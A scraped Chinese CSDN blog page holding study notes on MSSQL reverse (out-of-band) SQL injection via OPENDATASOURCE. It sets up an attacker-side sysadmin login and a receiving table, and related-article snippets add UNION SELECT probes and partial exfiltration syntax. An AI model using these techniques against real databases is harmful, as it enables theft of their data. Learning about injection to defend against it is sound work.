数据库注入学习笔记3---MSSQ注入(反弹注入)

最新推荐文章于 2023-06-26 14:43:01 发布

超级滑稽帝本人

最新推荐文章于 2023-06-26 14:43:01 发布

阅读量581

点赞数

分类专栏： SQL注入

本文链接：https://blog.csdn.net/qq_41759633/article/details/98746906

版权

SQL注入专栏收录该内容

15 篇文章 0 订阅

订阅专栏

引：MSSQL注射攻击是最为复杂的数据库攻击技术，由于该数据库功能十分强大，存储过程以及函数语句十分丰富，这些灵活的语句造就了新颖的攻击思路，而反弹注入技术需要依靠opendatasource函数支持

opendatasource：‘使用opendatasource函数将当前数据库中查询的结果发送到另一数据库服务器中’

攻击过程:

攻击前准备：

首先需要在攻击者主机的SQL server 2000中建立一个具有管理权限的数据库账户

exec master.dbo.sp_addlogin h4ck,c4ck;--
exec master.dbo.sp_addsrvolemember h4ck,sysadmin;--
其中添加的用户名为h4ck,密码为h4ck.//sysadmin为管理员权限

使用建立的SQL语句账户登录数据库，这里使用查询分析器进行连接。利用SQL语句建立一个数据库以及表和字段等

create database test---
use test crate table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255))--

其中建立一个名为test的库，在test库下建立temp表以及id,num1,num2.num3等字段用于存放数据

在这里插入图片描述
数据查询语句：select * from temp

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

超级滑稽帝本人

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

用T-SQL语句完成创建与管理数据库操作练习.doc

11-17

例如，修改`employees`数据库，添加一个名为`employee3`的数据文件： ```sql ALTER DATABASE employees ADD FILEGROUP data1 ALTER DATABASE employees ADD FILE (NAME=employee3, FILENAME='d:\', SIZE=1, ...

18、注入篇--反弹注入（MSSQL）

WX公众号-小白学安全

04-10

779

MSSQL MSSQL基础 MSSQL是指微软的SQLServer的数据库服务器每个库都会自带有sysobjects表，其中有三个字段 name 当前数据库下的所有表名 id 相当于表名的标识 xtype 字段中 U 代表用户创建的表名，S代表系统创建的每个库都会自带有syscolumns表,其中有两个字段 name 每个表的字段名 id 对应sysobjects表中id字段反弹注入原理原理：将目标站点中查询到的数据结果传到攻击者的数据库中注入条件

参与评论您还未登录，请先登录后发表或查看评论

MSSQL基本使用

技术超强的网络安全平台

12-01

6748

0x00 简介 Microsoft SQL Sever 分为很多个版本,版本的不断的升级安全性也越来越高,对我们渗透过程中最喜欢的版本应该就是2008以前，在2008及其以后的版本数据库的权限已经不再是system,为了迎合新的版本我接下来的实验都在2008版本下面进行，同时也介绍以前可以利用的方法，相对于MySQL这个mssql显得重了许多，他众多的功能也给我们注入过程带来了便利，所以一般数据库为mssql支持多语句我们就考虑是不是应该直接拿下webshell。 0x01 默认库的介绍 master

MSSQL注入——反弹注入

m0_55854679的博客

02-18

940

文章目录MSSQL【SQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQL【SQL server】反弹注入使用场景与mysql大同小异，注入思路相同，但用到的函数等不同。反弹注入 => 注入的手法（偏门）oob => 把查询到的数据插入外部的数据库（公网ip），反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。快速搭建MSSQL

MSSQL数据库系统

最新发布

Hdvsns的博客

06-26

1628

由于微软和Linux的紧密的联系的建立,Linux系统管理员如果想始终保持在他们的事业顶端，需要有关于MS SQL Server的渊博知识。我们这次用的是mssql-server-preview/下的mssql-server-15.0.1100.94-1.x86_64.rpm。4.选择开发版2和简体中文10，并输入sa(mssql的系统管理账号)用的较复杂密码两遍（建议用Aa123456)mssql-tools安装目录加入系统路径(未关机生效）。1.进入安装目的目录/opt/mssql/bin/

mssql（1433端口）介绍

山兔的博客

12-04

3677

Microsoft SQL Server是一个关系型数据库，微软开发的管理系统。作为数据库服务器，它是一种软件产品，其主要功能是存储和检索其他软件应用程序所请求的数据，这些应用程序可以运行在同一台计算机上，也可以运行在网络（包括Internet）上的另一台计算机上。默认运行在1433端口master Database：记录SQL Server实例的所有系统级信息。msdb Database：由SQL Server代理用于安排警报和作业。model Database：用作在SQL Server实例上创建的所有

MSSQL注入攻击的防护

05-18

SQL注入攻击是指攻击者通过在输入字段中插入恶意SQL代码来操纵或控制数据库的行为。对于MSSQL而言，这种攻击可能导致敏感数据泄露、非法数据修改甚至服务器被完全控制等严重后果。 #### 攻击案例解析在提供的部分...

mssql-jdbc-8.2.2.jre8.zip

06-23

用于连接ms sql server数据库的jdbc jre包，版本是8.2.2，配置方式： (ip地址);DatabaseName=(你的数据库名)"/>

MSSQL-反弹注入(zkaq靶场)

v2ish1yan的博客

04-29

3456

MSSQL就是sql server 他跟mysql进行注入的方式有所不同这里写两种方法 1.联合查询注入首先mssql使用联合查询时，是不能用select 1,2,3这样填充的，必须要和表中的数据类型一样，但是可以使用null来填充首先来猜字段 order by 3时正确，order by 4时错误所以字段数为3 然后进行猜数据类型。先 ?id=1’ union all select NULL,NULL,NULL – qwe 回显正常挨个测试数据类型 ?id=1’ union all sele

MSSQL注入之反弹注入

MSB_WLAQ的博客

10-06

478

MSSQL反弹注入原理依靠 opendatasource 函数,把查询出的数据发送到MSSQL服务器上。 MSSQL反弹注入使用场景用香港云快速搭建一个MSSQL环境可以用临时邮箱注册免费的试用60天。免费60天的试用，过期了就换个邮箱。 1.猜数据时为什么不能用数字根据了MSSQL的特性，虽然不能用数字但可用null和字母填充 2.MSSQL有系统自带库吗有为master.dbo.sysdatabase 3.反弹注入满足的条件能否堆叠查询，...

mysql注入反弹_一个mysql注入引发的通宵

weixin_34219634的博客

01-19

224

本来没准备通宵的，在t00ls看了会文章，然后准备睡觉，就在准备睡觉的时候，无意中发现了以前看过的某站(我属于看干劲做事的那种，当时没干劲，没搞下，然后最近干劲十足，在一看发现遍地是漏洞。。。)然后，我的通宵之mysql注入艰难拿shell就此开始......发现SQL注入漏洞跑了下二级，然后打开一个个随手测试，因为当时准备睡觉了，所以也就没想过认真搞。。。加个admin，后台出来，输入admin...

Oracle注入 - 命令执行&Shell反弹

热门推荐

3569

05-07

1万+

https://www.t00ls.net/thread-45663-1-1.html0x01 Oracle安装CentOS 7 安装oracle10g，装了一天，特此记录 oracle9i,10G,11G,各版本下载资源Centos6/7下静默安装oracle10g0x02 命令执行本文测试环境均为：CentOS Linux release 7.2.1511 (Core)Oracle Datab...

MSSQL注入 — 反弹注入

qq_58000413的博客

09-21

738

database=hacker数据库名 ').数据库名.dbo.表名 select *(被攻击网站的字段,通过order by已经判断出来了) from admin。database=数据库名 ').数据库名.dbo.字段（字段可以多个，逗号隔开）反弹注入原理，将目标的数据全部反弹到自己构造的数据库中，opendatasource就是连接自己数据库用的（select * from syscolumns where id='前面查到的id值'

Mssql注入——dns注入，反弹注入

weixin_46601374的博客

02-28

2895

DNS注入 DNS注入原理通过子查询，将内容拼接到域名内，让load_file()去访问共享文件，访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件，通过拼接出函数做查询,拼接到域名中，访问时将访问服务器，记录后查看日志。 load_file函数的作用用于读取文件内容，并返回输出 load_file函数是什么 load_file 读取文件函数，读取的内容返回为字符串输出。 load_file函数在注入的作用利用读取注入的报错信息，然后返回报错信息(显

MSSQL-数据库简介 132

iqifenxia的博客

12-23

2294

　　SQL:一般指结构化查询语言,用于访问和处理数据库的标准的计算机语言;数据库Database通俗点说就是存储数据的仓库,仓库中有很多的分类,仓库中还会有仓库管理员(DBA)对货物进行管理,而程序员就是对仓库数据进行存取使用的人　　数据库分为很多种:1)MSSQL 2)DB2 3)Oracle 4)Access 5)SQLited等,像其中的2,3多用于大型的数据存取,4操作文件数据的5用于极其轻量级数据库 　　将要学习的MSSQL Sever一般用于要求不是特别的严谨的地方,学习这个主要是其与..

MSSQL--反弹注入

qq_68233961的博客

08-15

262

MSSQL--反弹注入

mysql反弹注入平台_MSSQL注入--反弹注入

weixin_30284287的博客

02-11

242

明明是sql注入的点，却无法进行注入，注射工具拆解的速度异常的缓慢，错误提示信息关闭，无法返回注入的结果，这个时候你便可以尝试使用反弹注入，反弹注入需要依赖于函数opendatasource的支持，将当前数据库中的查询结果发送到另一数据库服务器中。判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and ex...

oralce反弹注入攻击实战

chuancuili8770的博客

01-14

414

作者:BlAck.Eagle 声明：严禁按照本文进行攻击等非法操作，后果自负，本文旨在信息安全技术研究估计大家读了《oracle注入实战之渗透联通》一文之后都会为之一震，但是笔者不知道读者朋友有没有遇到过和笔者相似的情况，就是用union select语句爆全部的表的时候，根本...